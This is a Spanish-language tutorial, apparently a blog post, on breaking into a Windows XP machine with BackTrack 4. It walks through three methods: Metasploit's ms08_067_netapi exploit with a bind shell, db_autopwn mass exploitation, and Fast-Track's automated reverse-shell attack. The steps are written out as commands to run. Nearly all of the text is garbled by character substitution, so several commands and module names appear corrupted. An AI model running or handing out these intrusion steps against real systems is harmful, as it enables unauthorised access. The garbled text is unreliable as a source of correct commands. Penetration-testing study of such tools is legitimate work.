Acceso a un sisema con Bac'rac' 4

En ese manua1 veremso a1gunas de 1as diferenes formas mas basicas de

como accerder a un sisema ui1izando esa gran herramiena (Bac'rac'
4), raare de ser 1o mas exp1icaivo que pueda.
E1 acceso a un sisema es e1 ercer paso de 1a esrucura de un aaque,
por ahora 11evamos:
[*|E1 Reconocimieno (hp://e1ecr0s0f.b1ogspo.com/2010/01/e1-escaneo-
de-un-sisema-es-e1.hm1).
[*|E1 Escaneo (hp://e1ecr0s0f.b1ogspo.com/2010/01/reconocimieno-de-
un-sisema-con-b4-e1.hm1)
Rara poder 11egar a ese paso bien, sabiendo donde esamos "pisando o
para ubicarnos de que es 1o que esamos haciendo enemos que pasar por e1
reconocimieno y e1 escaneo.
Ya basandonos en 1os resu1ados que obuvimos en 1a pare de escaneos de
vu1nerabi1idades de a11i podemos empezar a basarnos de por que fa11o o
vu1nerabi1idad podemos aprovechar para acceder a1 sisema.
Mas que odo ese paso ui1izaremos mucho e1 aspeco de aprovechamieno
de vu1nerabi1idades y nos basaremos en 1a informacion aneriormene
recopi1da.
Inroduccion a MSE
Measp1oi es una gran herramiena a 1a hora de exp1oar fa11os de un
sisema, es una gran p1aaforma que iene:
[*| 490 exp1ois
[*| 230 Auxi1iary
[*| 192 pay1oads
[*| 23 encoders
Exp1oi ---> Es un fracmeno de programa o un programa hecho para
exp1oar un fa11o de a1gun sisema especifico.
Sinaxis en e1 MSE:
use windows/smb/ms08_067_neapi
A11i 1e especificamos a1 meap1oi que se1ecionamos e1 exp1oi
windows/smb/ms08_067_neapi.
Ray1oad ---> Lo ui1izamos en e1 measp1oi como 1a accion que se va a
hacer despues de haver exp1oado e1 fa11o.
Sinaxis en e1 MSE:
use RAYLOA windows/she11/bind_cp
A11i 1e especificamos a1 measp1oi que se1eccionamos e1 pay1oad
windows/she11/bind_cp, ese pay1oad 1a accion que e_ecua es de vo1ver
una She11 de1 sisema que hemos exp1oado e1 fa11o.
Auxi1iary ---> son scrips que sup1anan funciones de oros programas.
Sinaxis en e1 MSE
use fuzzers/ssh/ssh_version_2
Ese modu1o envia una serie de peiciones SSH con cadenas de version
ma1iciosos.
Measp1oi #1
En ese e_emp1o voy a mosrar como aprovecharse de una vu1nerabi1idad de
un ob_eivo con sisema operaivo windows XR SR2 y SR3.Rrimeramene
miramos si e1 equipo esa "vivo.
Ahora vamos a escanear nuesro equipo ( repaso de escaneo de un sisema
con b4) en e1 e_emp1o de1 doc Escaneo de un sisema vamos a ener 1os
mismo resu1ados.
Como vemos e1 puero 445 esa habi1idaado, en e1 doc de escaneo de un
sisema e1 nessus nos mosro que ese puero esa e_ecuando un servicio
vu1nerab1e, e1 exp1oi para esa vu1nerabi1idad es e1 ms08_067_neapi.
Ahora vamos a pasar a configurar e1 exp1oi desde measp1oi.
Rrimeramene se1eccionamos e1 exp1oi
Ahora vamos a configurar1o.
Aqui nos pide e1 RHOST (seria 1a direccion IR de nuesro ob_eivo) 1uego
nos define por defeco e1 puero e1 445 que es e1 que iene 1a
vu1nerabi1idad anes hab1ada. Y 1e asignamos direccion IR.
Ahora e1 siguiene paso es asignar e1 pay1oad y configurar1o. Voy a
ui1izar e1 windows/she11/bind_cp que es uno de 1os pay1oad mas basicos
que iene en B e1 measp1oi. Usedes son 1ibres de usar e1 que usedes
quieran, si quieren ver mas pay1oad so1o es cuesion de ec1ear show
pay1oads.
Ahora miramos que opciones enemos que configurar.
Como vemos aqui ya e1 measp1oi 1o definio por defeco, pero aveces nos
va a pedir un LHOST y ese seria nuesra IR enonces para definir 1a
variab1e LHOST 1o unico que enemo que hacer es 1o siguiene.
Sinaxis en e1 measp1oi:
se LHOST xxx.xxx.xxx.xxx
bueno ahora como ya enemos odo configurado ahora vamos a e_ecuar e1
exp1oi para accerder a1 sisema.
Esamos denro de1 sisema ob_eivo, exacamane en e1 cmd ubicado en e1
C:\WINOWS\sysem32>. Ahora vamos a hacer una prueba.
auo_pwn#2
Esa es un exce1ene! Herramiena que rae con si e1 measp1oi, esa
herramiena es oa1mene auomaizada empieza a probar exp1oi por
exp1oi hasa que a1 fin consigue exp1oar e1 fa11o, ambien se basa en
resu1ados de un escaneo (nmap, nessus, openvas) y de a11i pare para
basar en 1a exp1oacion de 1a vu1nerabi1idad.
Empezamos!!!
Rrimeramene vamos a configurar nuesro measp1oi para poder empezar con
nuesra inrusion. Creamo una Base de daos en e1 measp1oi donde va a
quedar guardado e1 resu1ado de1 escaneo con nmap.
Ahora vamos a ver que hos enemos definidos para hacer e1 escaneo.
Si cuando miran que hos esan definos y no e aparece nada, so1o enemos
que hacer e1 escaneo con nmap y hay 1o defines auomaicamene.
Ahora despues de1 escaneo nos diri_imos a ui1izar e1 auopwn.
Sinaxis de measp1oi:
msf>db_auopwn - -p -e -x
En 1a sinaxis 1o que esamos haciendo en probar con odos 1os exp1oi,
desde cua1quier inerface de red y que se base en 1os puero que iene
habi1iados anes mosrado por e1 nmap.
Hemos conseguido dos secciones =). despues de probar exp1oi por exp1oi
hemos conseguido 2 secciones de meerpreer, ahora so1o vamos a
conecarnos a e11as y 1iso.
Eas rac'#3
Es un proyeco basado en Ryhon de codigo abiero desinado a ayudar a
1os Ren-Tes en un esfuerzo por idenificar, exp1oar. ui1iza una gran
pare de 1a Metasploit Framework para erminar 1os aaques con exio.
Fast Track iene una amp1ia variedad de aaques nicos que 1e permien
ui1izar e1 marco de Measp1oi a su maximo poencia1. En ese e_emp1o
vamos a ui1izar 1a opcion de auomaizacion que nos ofrece esa
herramiena.
Ahora ec1eamos ./fas-rac' -c 2 para se1eccionar 1a herramiena 2.
Auopwn Auomaed
Ahora 1e vamos a especificar a1 fas-rac' que vamos a se1eccionar e1
pay1oad Reverce_cp y 1e predefinimos 1a ip de nuesro ob_eivo
Lo configuramos de 1a siguiene manera:
./fas-rac'.py -c 2 172.16.94.129 -r
y e1 fas-rac' 1o acepa y empieza nuesro aaque auomaizado. Empieza
a ineracuar con e1 measp1oi dando1e 1os daos que nosoros 1e
predefinimos anes, y a e_ecuar 1os srips de nuesro aaque.
Como vemos primeramene borro 1a B penes de1 measp1oi, 1uego creo 1a
base de daos penes y 1uego hiso e1 escaneo con nmap para basarse en e1
aaque con auo_pwn.
La siguiene accion que va a e_ecuar es e1 auopwn.
Ahora veremos que esa e_ecuando e1 auo_pwn y empieza a probar exp1oi
por exp1oi basandose en e1 escaneo que hiso con e1 nmap aneriormene.
espues de un buen rao de probar exp1oi por exp1oi, 1ogramos.
Acabamos de ver 3 formas de como acceder a un sisema pariendo de 1os
fa11os que presenan 1os servicios que se esan e_ecuando en e1 sisema
ob_eivo ( Windows XR Sp3 ).
Lin's de apoyo
[*| hp://b1ip.v/fi1e/3105815 -----> Inrusion auomaizada <auo_pwn>
[*| hp://b1ip.v/fi1e/3077564 -----> Accediendo a un sisema con b4
Espero que 1es ha11a servido esa documenacion.
------------------------------------------------------------------------
R: si engo a1gun error por favor hagame1o saber.
R2: si vas a co1ocar esa documenacion en a1gun oro 1ado por favor
respea 1os derechos de auor :)
B1og: hp://e1ecr0s0f.b1ogspo.com/
Correo:e1ecrosou1_22@homai1.com
dprogresive@gmai1.com